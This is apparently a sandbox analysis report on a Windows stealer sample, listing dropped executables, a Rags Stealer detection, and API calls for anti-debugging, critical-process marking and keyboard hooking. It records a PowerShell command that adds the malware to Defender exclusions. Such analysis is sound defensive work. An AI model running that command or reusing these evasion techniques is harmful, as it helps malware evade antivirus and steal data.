                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:42
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Umbral.exe"
                                      Imagebase:0x2e687550000
                                      File size:236'544 bytes
                                      MD5 hash:DF69E1468A4656F2EEC526DE59A89A8B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:43
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:44
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:45
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe'
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:46
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                                      Imagebase:0x840000
                                      File size:606'720 bytes
                                      MD5 hash:0BA8218F991E81620F31083273EE7D91
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:47
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:48
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:49
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                                      Imagebase:0xb00000
                                      File size:805'888 bytes
                                      MD5 hash:A99954BFF017983BF455DE31C5F0696A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:50
                                      Start time:19:47:09
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff61de30000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:51
                                      Start time:19:47:09
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\timeout.exe
                                      Wow64 process (32bit):false
                                      Commandline:timeout 4 /nobreak
                                      Imagebase:0x7ff622290000
                                      File size:32'768 bytes
                                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:52
                                      Start time:19:47:10
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\mode.com
                                      Wow64 process (32bit):false
                                      Commandline:mode con: cols=103 lines=21
                                      Imagebase:0x7ff686c50000
                                      File size:33'280 bytes
                                      MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:54
                                      Start time:19:47:11
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:55
                                      Start time:19:47:11
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:56
                                      Start time:19:47:11
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Insidious.exe"
                                      Imagebase:0x220c76f0000
                                      File size:281'088 bytes
                                      MD5 hash:B70C03532081C928F946E844C5D2172D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: 00000038.00000002.2206155033.00000220C9505000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      General

                                      Target ID:57
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                                      Imagebase:0x630000
                                      File size:212'480 bytes
                                      MD5 hash:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:58
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                                      Imagebase:0x8f0000
                                      File size:606'720 bytes
                                      MD5 hash:0BA8218F991E81620F31083273EE7D91
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:59
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                                      Imagebase:0x470000
                                      File size:805'888 bytes
                                      MD5 hash:A99954BFF017983BF455DE31C5F0696A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:60
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:61
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Umbral.exe"
                                      Imagebase:0x232b7f80000
                                      File size:236'544 bytes
                                      MD5 hash:DF69E1468A4656F2EEC526DE59A89A8B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:62
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:63
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:64
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff61de30000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:65
                                      Start time:19:47:13
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\timeout.exe
                                      Wow64 process (32bit):false
                                      Commandline:timeout 4 /nobreak
                                      Imagebase:0x7ff622290000
                                      File size:32'768 bytes
                                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:66
                                      Start time:19:47:14
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:116
                                      Start time:19:47:22
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:130
                                      Start time:19:47:24
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:142
                                      Start time:19:47:26
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:333
                                      Start time:19:47:50
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:347
                                      Start time:19:47:52
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:444
                                      Start time:19:48:05
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7e52b0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      General

                                      Target ID:751
                                      Start time:19:48:47
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 00007FF848E60A21 Relevance: .4, Instructions: 400COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2043303832.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848e60000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 13866dcede637a52b81f521c8796acb64d151a3d73f9064f4fd76af356551bd6
                                        • Instruction ID: 66a3802f42a41c8c15fe4eb6dfb5e12c34ce7cf8b3fcd5883c7e8888e6f0fbf4
                                        • Opcode Fuzzy Hash: 13866dcede637a52b81f521c8796acb64d151a3d73f9064f4fd76af356551bd6
                                        • Instruction Fuzzy Hash: 26D19130A189298FDB98FB28D458ABE77E2FF58351F540679D41AE31D2DF34AC118744
                                        Function 00007FF848E604B2 Relevance: 1.8, Strings: 1, Instructions: 517COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2043303832.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848e60000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CO_^
                                        • API String ID: 0-3937211734
                                        • Opcode ID: e012fa9b75f6faa4f2bb161de752eedb70d2e46c4cd50a805380aa2d58cae38f
                                        • Instruction ID: 12fb6417ea676bdbfe4ef2830fcb556bb9c7993780adf14e2bedd9924bc07466
                                        • Opcode Fuzzy Hash: e012fa9b75f6faa4f2bb161de752eedb70d2e46c4cd50a805380aa2d58cae38f
                                        • Instruction Fuzzy Hash: 8C413A61E0DED29FE259B77818191A9BBD0FF62360F4C41BBC058670D3DF2978168395
                                        Function 00007FF848E612D4 Relevance: .6, Instructions: 602COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2043303832.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848e60000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: da2b70e614015181e9f566d1494d0cd115fc2945f543e1b4254723559a606b9d
                                        • Instruction ID: eb8a9e4d95f2a92968e5d97c3c064fc90f6fbe4bdb86bd1ade537efb26cf6893
                                        • Opcode Fuzzy Hash: da2b70e614015181e9f566d1494d0cd115fc2945f543e1b4254723559a606b9d
                                        • Instruction Fuzzy Hash: 8BB12461E1CA855FE399EB3C58593B8BBD1FF98290F8801BAD40DD3283DF39A8458355
                                        Function 00007FF848E604A8 Relevance: .3, Instructions: 332COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2043303832.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848e60000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f78902269b3b8c7e5ded9bb255f71dbf487fd386fe147a856c49abd85572164
                                        • Instruction ID: 9a80186e6334542cf7785af2900a9046c98808d9d05cf743d0e035086ee4a464
                                        • Opcode Fuzzy Hash: 3f78902269b3b8c7e5ded9bb255f71dbf487fd386fe147a856c49abd85572164
                                        • Instruction Fuzzy Hash: 03A11460E1CA495FE789EB3C54593B9BBD2FF98390F480179D40ED3282DF38A8418355
                                        Function 00007FF848E6109E Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2043303832.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848e60000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22a0ebc37b4ca071c9bf23c69e6443d2b029137dada6f4dd762d277614b12f92
                                        • Instruction ID: 9a6fcd868f3696ba24c7d8e1a51dc9c2d1108cdb73ff1e60639bf1b1f5e6f50a
                                        • Opcode Fuzzy Hash: 22a0ebc37b4ca071c9bf23c69e6443d2b029137dada6f4dd762d277614b12f92
                                        • Instruction Fuzzy Hash: E6E06D12F1D8590BEBA8B56D64952B863C2EBDC661B40123AD00DD338AEE295C824641
                                        Function 00007FF848E609E6 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2043303832.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848e60000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1bd60b3234640efa12fb05322fe6827c9ee573cbb6afcf4c510d0e4174105480
                                        • Instruction ID: a8df2c0fffceced0fa026cd1bb01691ca0b205b574d809ead6e02f5b2f6e5fa9
                                        • Opcode Fuzzy Hash: 1bd60b3234640efa12fb05322fe6827c9ee573cbb6afcf4c510d0e4174105480
                                        • Instruction Fuzzy Hash: 12E0CD20718D250BDB88F5185441DBD77C1E7C4390F440464F40DD3285DF1CAA8143D5

                                        Executed Functions

                                        Function 00007FF848E70A21 Relevance: .4, Instructions: 401COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2066391322.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fa31dfbc4e1e2ac00da8e7b96f5a7885eb9e9b029412ed8f66651d57545fdce
                                        • Instruction ID: 035bbab40cb49c03d28306c937a9f82888f741ab0e5d138dc02e1c7f6b1800a7
                                        • Opcode Fuzzy Hash: 5fa31dfbc4e1e2ac00da8e7b96f5a7885eb9e9b029412ed8f66651d57545fdce
                                        • Instruction Fuzzy Hash: B1D17D30A1891D8FDB98FB68D458ABA73E2FF58351F144679E42AD32D2DF34AC518740
                                        Function 00007FF848E704B2 Relevance: 1.8, Strings: 1, Instructions: 518COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2066391322.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CN_^
                                        • API String ID: 0-3949952865
                                        • Opcode ID: 95711f3a38ce87936b03257d58466db44da2c05036434b4fcef3d67f0daba067
                                        • Instruction ID: f5330a3c76d6cefe9af2dd0e4b494d8d35ae3fb6303a13ab9d0161bd325bd3ab
                                        • Opcode Fuzzy Hash: 95711f3a38ce87936b03257d58466db44da2c05036434b4fcef3d67f0daba067
                                        • Instruction Fuzzy Hash: ED41C961E0D9C29FF259B7B858191A9BBD0FF627A1F0C41B7C058470D3EF2968168395
                                        Function 00007FF848E704A8 Relevance: .3, Instructions: 332COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2066391322.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 311f99664b0d4c946ca78fa7106dc9c15d8acf2842f9b02095bd6b522801dcaa
                                        • Instruction ID: e138079d7b839a464f86affebb036c93ab18677ab78e6112ccdaa83d8b3c85a5
                                        • Opcode Fuzzy Hash: 311f99664b0d4c946ca78fa7106dc9c15d8acf2842f9b02095bd6b522801dcaa
                                        • Instruction Fuzzy Hash: D2A1E261E1CA495FE798EB3C98593B9BBD2FF98790F080179D40EC3282DF38A8458755
                                        Function 00007FF848E7109E Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2066391322.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f61d35be6b1f151c2bea6c82d3d25cd71ebc991127cfd3691859d372a92bb73f
                                        • Instruction ID: d23f1b801910a5227eb9f7a7c765e442ef1d80470aa644248b7b949511d95924
                                        • Opcode Fuzzy Hash: f61d35be6b1f151c2bea6c82d3d25cd71ebc991127cfd3691859d372a92bb73f
                                        • Instruction Fuzzy Hash: 58E06D02B1D8490BE698B5AC68992B863C2E7DD6A1B50523AD00DC338AED295C824641
                                        Function 00007FF848E709E6 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2066391322.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2902e65866311b76aa20c13054760097a77fca54d6785a864e7eba523075012
                                        • Instruction ID: aaab496e018528d51a58a5b048e418da995cf6cf5d5640e6295331a53647bc59
                                        • Opcode Fuzzy Hash: b2902e65866311b76aa20c13054760097a77fca54d6785a864e7eba523075012
                                        • Instruction Fuzzy Hash: 7BE0C220A18D250BEB88FA18A442DBD77C1EB843D0F480468F80DC33C2DE28AA8183D6

                                        Execution Graph

                                        Execution Coverage:27.6%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:33.3%
                                        Total number of Nodes:9
                                        Total number of Limit Nodes:0

                                        Executed Functions

                                        Function 00007FF848E57A81 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 434 7ff848e57a81-7ff848e57b3d CheckRemoteDebuggerPresent 438 7ff848e57b3f 434->438 439 7ff848e57b45-7ff848e57b88 434->439 438->439
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3354395035.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff848e50000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID: CheckDebuggerPresentRemote
                                        • String ID:
                                        • API String ID: 3662101638-0
                                        • Opcode ID: 84b4181721972fe82625927c884fa33c499151eb789346bc50b85e28983d55bb
                                        • Instruction ID: 144fdc651f875ed8e2bbccc1c2b7f8911e42f331bc077911d248f2b7520aacf5
                                        • Opcode Fuzzy Hash: 84b4181721972fe82625927c884fa33c499151eb789346bc50b85e28983d55bb
                                        • Instruction Fuzzy Hash: 30312331908B5C8FCB58DF58C88A7E97BE0FF65321F04426BD489D7292DB34A846CB91
                                        Function 00007FF848E59C4D Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 413 7ff848e59c4d-7ff848e59d30 RtlSetProcessIsCritical 417 7ff848e59d38-7ff848e59d6d 413->417 418 7ff848e59d32 413->418 418->417
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3354395035.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff848e50000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID: CriticalProcess
                                        • String ID:
                                        • API String ID: 2695349919-0
                                        • Opcode ID: dd207c21b98216e002c95219bd0d58d693c8a3662c93ad57236c7d4f2c9b2a11
                                        • Instruction ID: 65aa9a6fee04d2ed42d263108ba59d59f2a7cbc3d835ca9c1daec9eb6f21a9cd
                                        • Opcode Fuzzy Hash: dd207c21b98216e002c95219bd0d58d693c8a3662c93ad57236c7d4f2c9b2a11
                                        • Instruction Fuzzy Hash: AE41C13180CA588FD719DFA8D845BE9BBF0FF56311F08416EE08AD3692CB746846CB91
                                        Function 00007FF848E59988 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 420 7ff848e59988-7ff848e5998f 421 7ff848e5999a-7ff848e59a0d 420->421 422 7ff848e59991-7ff848e59999 420->422 426 7ff848e59a99-7ff848e59a9d 421->426 427 7ff848e59a13-7ff848e59a20 421->427 422->421 428 7ff848e59a22-7ff848e59a5f SetWindowsHookExW 426->428 427->428 430 7ff848e59a67-7ff848e59a98 428->430 431 7ff848e59a61 428->431 431->430
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3354395035.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff848e50000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: 129d6362abdbc7bfd0d60f6e9b9422bb4c1002658343bdbfcd4783ca963db5ff
                                        • Instruction ID: 152fc04cbc03dd59f133a459c02667cfca85977840b993eb25c04ed4530e7e3b
                                        • Opcode Fuzzy Hash: 129d6362abdbc7bfd0d60f6e9b9422bb4c1002658343bdbfcd4783ca963db5ff
                                        • Instruction Fuzzy Hash: 6141163091CA4D8FDB59EB6898466F9BBE1FB59321F00023EE00DC3292CB74A8028781

                                        Executed Functions

                                        Function 00007FF848E60A41 Relevance: .4, Instructions: 400COMMON
                                        Download Yara Rule
                                        Memory Dump Source
